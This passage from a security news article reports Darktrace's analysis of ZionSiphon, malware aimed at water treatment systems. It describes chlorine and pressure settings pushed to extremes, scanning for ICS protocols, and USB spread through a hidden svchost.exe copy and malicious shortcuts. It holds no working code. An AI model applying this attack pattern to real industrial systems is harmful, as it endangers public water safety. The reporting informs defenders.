“The appended block of text contains the following entries: “Chlorine_Dose=10”, “Chlorine_Pump=ON”, “Chlorine_Flow=MAX”, “Chlorine_Valve=OPEN”, and “RO_Pressure=80”.”
The intention to interact with industrial control systems (ICS) is obvious from scanning the local subnet for the Modbus, DNP3, and S7comm communication protocols.
However, Darktrace has found only partially functional code for Modbus, and merely placeholders for the other two, indicating that the malware is still in an early development phase.
ZionSiphon also has a USB propagation mechanism that copies itself to removable drives as a hidden ‘svchost.exe’ process and creates malicious shortcut files that execute the malware when clicked.
Advertisement
Creating shortcuts on removable drives Source: Darktrace
USB propagation is key in critical infrastructure systems, where computers that manage security-critical functions are often “air-gapped,” meaning they are not directly connected to the internet.
While ZionSiphon isn’t operational in its current version, its intent and potential for damage are concerning, and all that’s needed to unlock both is to fix a minor verification error.
AI chained four zero-days into one exploit that bypassed both renderer and OS sandboxes. A wave of new exploits is coming.
At the Autonomous Validation Summit (May 12 & 14), see how autonomous, context-rich validation finds what’s exploitable, proves controls hold, and closes the remediation loop.
You must be logged in to post a comment Login